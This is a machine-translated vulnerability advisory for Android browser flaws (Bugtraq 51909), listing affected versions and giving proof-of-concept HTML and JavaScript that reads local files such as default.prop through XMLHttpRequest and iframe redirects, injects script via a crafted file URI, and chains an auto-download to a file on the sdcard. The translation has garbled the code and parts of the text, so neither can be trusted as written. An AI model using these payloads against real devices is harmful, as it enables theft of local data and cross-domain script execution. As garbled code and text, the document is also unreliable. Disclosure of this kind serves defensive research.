Release date:
Updated on:
Affected Systems:
Open Handset Alliance Android 2.3.2
Open Handset Alliance Android 3.5
Open Handset Alliance Android 3.2
Open Handset Alliance Android 3.1
Open Handset Alliance Android 3.0
Open Handset Alliance Android 2.4
Open Handset Alliance Android 2.3.6
Open Handset Alliance Android 2.3.4
Open Handset Alliance Android 2.3.1
Open Handset Alliance Android 2.3
Open Handset Alliance Android 2.2
Open Handset Alliance Android 2.2
Open Handset Alliance Android 2.1.1
Open Handset Alliance Android 2.1
Open Handset Alliance Android 2.0.1
Open Handset Alliance Android 2.0
Open Handset Alliance Android 1.5 CRCxx
Open Handset Alliance Android 1.5 CRBxx
Open Handset Alliance Android 1.5 CRB-43
Open Handset Alliance Android 1.5 CRB-42
Open Handset Alliance Android 1.5 COCxx
Open Handset Alliance Android 1.5 CBDxx
Open Handset Alliance Android 1.5
Open Handset Alliance Android 1.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51909
Android is a project launched by Google through Open Handset Alliance. It is used to provide a complete set of software for mobile devices, including operating systems and middleware.
Multiple security vulnerabilities exist in the implementation of Open Handset Alliance, remote attackers can exploit these vulnerabilities to bypass same-source protection, obtain sensitive information, execute arbitrary script code, steal Cookie authentication creden。, and perform certain administrator operations.
<* Source: 80vul
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Cross-domain scripting:
1.
<Script>
Var request = false;
If (window. XMLHttpRequest ){
Request = new XMLHttpRequest ();
If (request. overrideMimeType ){
Request. overrideMimeType ('text/xml ');
}
} Else if (window. ActiveXObject ){
Var versions = ['Microsoft. xmlhttp', 'msxml. xmlhttp ',
'Microsoft. xmlhttp ',
'Msxml2. XMLHTTP.7.0 ', 'msxml2. XMLHTTP.6.0', 'msxml2. XMLHTTP.5.0 ',
'Msxml2. XMLHTTP.4.0 ', 'msxml2. XMLHTTP.3.0', 'msxml2. xmlhttp'];
For (var I = 0; I <versions. length; I ++ ){
Try {
Request = new ActiveXObject (versions [I]);
} Catch (e ){}
}
}
Xmlhttp = request;
// Xmlhttp. open ("GET", "file: // default. prop", false );
// Xmlhttp. open ("GET", "http://www.80vul.com/", false );
Xmlhttp. send (null );
Var ret = xmlhttp. responseText;
Alert (ret );
</Script>
2.
<Iframe name = f src = "location. php"> </iframe>
<Script>
Function init (){
F. location = "file: // default. prop ";
}
SetTimeout (init, 5000)
</Script>
Security Weakness:
1.
<Iframe name = f src = "location. php"> </iframe>
<Script>
Function init (){
F. location = "file: // ssss <SC" + "ript> alert (1); </SC" + "ript> /";
}
SetTimeout (init, 5000)
</Script>
2.
<Meta http-equiv = "refresh" content = "0; URL = autodown. php"/>
<Iframe name = f src = "location. php"> </iframe>
<Script>
Function init (){
F. location = "file: // sdcard/Download/autodown.htm ";
}
SetTimeout (init, 5000)
</Script>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Open Handset Alliance
---------------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.openhandsetalliance.com/android_overview.html
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
